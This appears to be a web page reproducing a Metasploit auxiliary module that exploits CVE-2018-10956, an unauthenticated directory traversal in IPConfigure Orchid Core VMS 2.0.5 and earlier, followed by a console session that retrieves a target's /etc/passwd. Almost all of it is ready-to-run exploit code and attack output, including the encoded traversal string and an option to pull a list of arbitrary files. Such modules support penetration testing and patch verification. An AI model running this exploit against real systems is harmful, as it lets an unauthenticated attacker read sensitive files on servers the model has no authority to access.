扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 |
require 'msf/core' class MetasploitModule < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure', 'Description'=> %q{ Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read. This module was tested against 2.0.5. This has been fixed in 2.0.6. }, 'Author' => [ 'Sanjiv Kawa @kawabungah' ], 'License'=> MSF_LICENSE, 'References' => [ [ 'CVE', '2018-10956' ], [ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ], [ 'URL', 'http://ipconfigure.com/products/orchid-archives' ] ], 'DisclosureDate' => 'May 7, 2018')) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']), OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']), OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']), Opt::RPORT(80) ], self.class ) end def init_request(path) res = send_request_cgi({ 'method' => 'GET', 'uri'=> path }) return res end def run path = normalize_uri(target_uri.path) res = init_request(path) if res && res.code == 200 file = Array.new trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F" if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty? file = [datastore['FILE']] else file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines end for i in 0 .. file.length - 1 path = normalize_uri(target_uri.path) + trigger + file[i] res = init_request(path) if res.code == 200 print_good("Obtained #{datastore['FILE']}") puts res.body puts "" else print_error("#{datastore['FILE']} does not exist") puts res.body puts "" end end else print_error("Web Server is Unresponsive") end end end __END__ msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal): Name Current SettingRequiredDescription ---- ---------------------------------- FILE /etc/passwdyes This is the file to download INPUTFILE noSpecify a list of files to downloads Proxies noA proxy chain of format type:host:port[,type:host:port][...] RHOST10.100.100.100yes The target address RPORT80 yes The target port (TCP) SSLfalsenoNegotiate SSL/TLS for outgoing connections TARGETURI/yes The base path to Orchid VMS VHOST noHTTP server virtual host msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run [+] Obtained /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash |
体验盒子
